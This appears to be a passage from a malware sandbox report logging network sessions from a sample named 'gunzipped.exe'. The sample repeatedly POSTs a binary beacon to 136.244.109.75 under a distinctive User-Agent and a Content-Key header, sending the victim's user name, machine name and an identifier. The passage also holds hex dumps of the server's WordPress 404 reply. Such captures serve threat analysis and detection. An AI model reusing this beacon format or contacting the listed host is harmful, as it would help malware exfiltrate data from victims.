6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:32.866831064 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:32.866868973 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:32.866905928 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:32.866946936 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:32.866987944 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:32.867031097 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:32.867070913 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:32.867110014 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:32.867151976 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.549739136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:33.230597973 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:33.438812017 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:34.415122032 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:33 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:34.415174961 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:34.415191889 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:34.415225029 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:34.415246964 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:34.415265083 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:34.415297985 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:34.415318012 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:34.415337086 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:34.415358067 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.549740136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:34.754471064 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:34.958280087 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:35.881505966 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:34 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
